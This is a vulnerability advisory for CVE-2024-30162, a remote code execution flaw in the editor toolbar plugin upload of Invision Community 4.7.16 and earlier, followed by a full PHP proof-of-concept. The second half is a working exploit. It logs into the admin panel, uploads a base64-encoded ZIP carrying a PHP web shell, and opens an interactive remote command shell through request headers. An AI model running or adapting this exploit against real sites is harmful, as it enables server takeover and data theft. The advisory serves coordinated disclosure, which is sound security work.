Invision Community 4.7.16 Remote Code Execution

`------------------------------------------------------------------------------  
Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability  
------------------------------------------------------------------------------  
  
  
[-] Software Link:  
  
https://invisioncommunity.com  
  
  
[-] Affected Versions:  
  
Version 4.7.16 and prior versions.  
  
  
[-] Vulnerability Description:  
  
The vulnerability is located in the  
/applications/core/modules/admin/editor/toolbar.php script.  
Specifically, into the  
IPS\core\modules\admin\editor\_toolbar::addPlugin() method, which will  
handle  
the upload of a ZIP file, trying to extract its content into the  
/applications/core/interface/ckeditor/ckeditor/plugins/ directory; if  
the ZIP archive does not include  
a plugin.js file, then the extracted ZIP content will be recursively  
deleted from the file system,  
otherwise it will stay there. This can be exploited to execute  
arbitrary PHP code by uploading a  
ZIP archive containing a plugin.js file (which can also be empty)  
along with a PHP file. Successful  
exploitation of this vulnerability requires an Administrator account  
having the "toolbar_manage" permission.  
  
  
[-] Proof of Concept:  
  
https://karmainsecurity.com/pocs/CVE-2024-30162.php  
  
  
[-] Solution:  
  
No official solution is currently available.  
  
  
[-] Disclosure Timeline:  
  
[08/01/2024] - Vulnerability details sent to SSD Secure Disclosure  
[12/03/2024] - Version 4.7.16 released, but the issue is still not fixed  
[20/03/2024] - CVE identifier requested  
[24/03/2024] - CVE identifier assigned  
[05/04/2024] - Coordinated public disclosure  
  
  
[-] CVE Reference:  
  
The Common Vulnerabilities and Exposures project (cve.mitre.org)  
has assigned the name CVE-2024-30162 to this vulnerability.  
  
  
[-] Credits:  
  
Vulnerability discovered by Egidio Romano.  
  
  
[-] Other References:  
  
https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/  
  
  
[-] Original Advisory:  
  
http://karmainsecurity.com/KIS-2024-03  
  
  
-----------------------  
PoC:  
  
<?php  
  
/*  
------------------------------------------------------------------------------  
Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability  
------------------------------------------------------------------------------  
  
author..............: Egidio Romano aka EgiX  
mail................: n0b0d13s[at]gmail[dot]com  
software link.......: https://invisioncommunity.com  
  
+-------------------------------------------------------------------------+  
| This proof of concept code was written for educational purpose only. |  
| Use it at your own risk. Author will be not responsible for any damage. |  
+-------------------------------------------------------------------------+  
  
[-] Vulnerability Description:  
  
The vulnerability is located in the /applications/core/modules/admin/editor/toolbar.php script.  
Specifically, into the IPS\core\modules\admin\editor\_toolbar::addPlugin() method, which will  
handle the upload of a ZIP file, trying to extract its content into the  
/applications/core/interface/ckeditor/ckeditor/plugins/ directory; if the ZIP archive does  
not include a plugin.js file, then the extracted ZIP content will be recursively deleted  
from the file system, otherwise it will stay there. This can be exploited to execute  
arbitrary PHP code by uploading a ZIP archive containing a plugin.js file (which can  
also be empty) along with a PHP file. Successful exploitation of this vulnerability  
requires an Administrator account having the "toolbar_manage" permission.  
  
[-] Original Advisory:  
  
https://karmainsecurity.com/KIS-2024-03  
*/  
  
set_time_limit(0);  
error_reporting(E_ERROR);  
  
if (!extension_loaded("curl")) die("[-] cURL extension required!\n");  
  
if ($argc != 4) die("\nUsage: php $argv[0] <URL> <Email> <Password>\n\n");  
  
$url = $argv[1];  
$email = $argv[2];  
$passwd = $argv[3];  
$ch = curl_init();  
  
@unlink('./cookies.txt');  
  
curl_setopt($ch, CURLOPT_HEADER, true);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  
curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');  
curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');  
  
print "[+] Logging into AdminCP\n";  
  
curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=system&controller=login");  
curl_setopt($ch, CURLOPT_POST, false);  
  
if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");  
  
curl_setopt($ch, CURLOPT_POSTFIELDS, "csrfKey={$csrf[1]}&auth=".urlencode($email)."&password={$passwd}&_processLogin=usernamepassword");  
  
if (!preg_match("/303 See Other/i", curl_exec($ch))) die("[-] Login failed!\n");  
  
print "[+] Uploading malicious ZIP file\n";  
  
curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=editor&controller=toolbar&do=addPlugin");  
curl_setopt($ch, CURLOPT_POST, false);  
  
if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");  
  
$plg = md5(time()).".zip";  
  
@file_put_contents("rce.zip", base64_decode("UEsDBAoDAAAAADxvKFgecSjnMgAAADIAAAAJAAAAaW5kZXgucGhwPD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VSVkVSWydIVFRQX0MnXSkpOyA/PgpQSwMECgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAAABwbHVnaW4uanNQSwECPwMKAwAAAAA8byhYHnEo5zIAAAAyAAAACQAkAAAAAAAAACCAtIEAAAAAaW5kZXgucGhwCgAgAAAAAAABABgAgMvlSzJC2gGAy+VLMkLaAYDL5UsyQtoBUEsBAj8DCgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAJAAAAAAAAAAggLSBWQAAAHBsdWdpbi5qcwoAIAAAAAAAAQAYAAC84E4yQtoBALzgTjJC2gEAvOBOMkLaAVBLBQYAAAAAAgACALYAAACAAAAAAAA="));  
  
$params = ["csrfKey" => $csrf[1], "form_submitted" => 1, "editor_plugin_zip_noscript[]" => new CURLFile("rce.zip", "", $plg)];  
  
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);  
  
if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Upload failed!\n");  
  
print "[+] Launching shell\n";  
  
curl_setopt($ch, CURLOPT_URL, "{$url}applications/core/interface/ckeditor/ckeditor/plugins/{$plg}/");  
curl_setopt($ch, CURLOPT_POST, false);  
  
$phpcode = "print '____'; passthru(base64_decode('%s')); print '____';";  
  
while(1)  
{  
print "\ninvision-shell# ";  
if (($cmd = trim(fgets(STDIN))) == "exit") break;  
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode(sprintf($phpcode, base64_encode($cmd)))]);  
preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");  
}  
  
`